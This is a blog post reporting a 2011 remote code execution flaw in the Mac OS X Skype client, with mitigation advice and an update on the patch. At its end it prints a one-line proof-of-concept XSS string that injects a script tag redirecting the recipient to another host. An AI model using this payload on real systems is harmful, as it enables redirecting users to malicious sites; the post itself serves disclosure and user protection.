Skip to content

Posts tagged ‘hotfix’

7
May

Mac OS X Skype 0day Remote Code Execution Vulnerability [Updated]

A fairly significant 0day vulnerability is being reported in the Skype client (< 5.1.0.922) for Mac OS X. By sending a specially-crafted instant message, an attacker may be able to remotely execute code on the recipient’s computer and gain access to a root shell. This issue has been discovered (by accident it seems) by Gordon Maddern of Australian security consultancy Pure Hacking.

“About a month ago I was chatting on skype to a collegue about a payload for one of our clients.  Completely by accident, my payload executed in my collegues skype client. I decided to investigate a little further and found that the Windows and Linux clients were not vulnerable. It was only the Mac skype client that seemed to be affected. […] Low and behold (sic) I was able to remotely gain a shell.”

It is believed that due to the relative simplicity in the delivery of the payload, it may be possible for this attack to be automated in the form of a worm. Skype are aware of this issue, but have yet to release a patch (see below). Mac users should be extra careful until a patch is made available, and in the short term I recommend quitting Skype when not using it, or at least checking that your Skype client is set to only allow messages from your contacts (Skype > Preferences > Privacy Tab > Allow Messages From: Contacts).

No further details or proof-of-concept of the vulnerability are available as of yet, although I’d be interested to see it… time to start pasting random Metasploit payloads into Skype! ;)

[Updated 8/5/2011] Skype addressed this vulnerability in version 5.1.0.922 of the Mac OS X client. Run the updater by going to the Skype menu > Check for Updates, or download the latest  version here.

Full disclosure of the vulnerability is now available here. In short, the issue was a persistent XSS that could be used to redirect the user to a malicious website. Here’s the PoC attack string:

http://www.example.com/?foo=”><script>document.location=’http://10.11.1.225′;</script>

css.php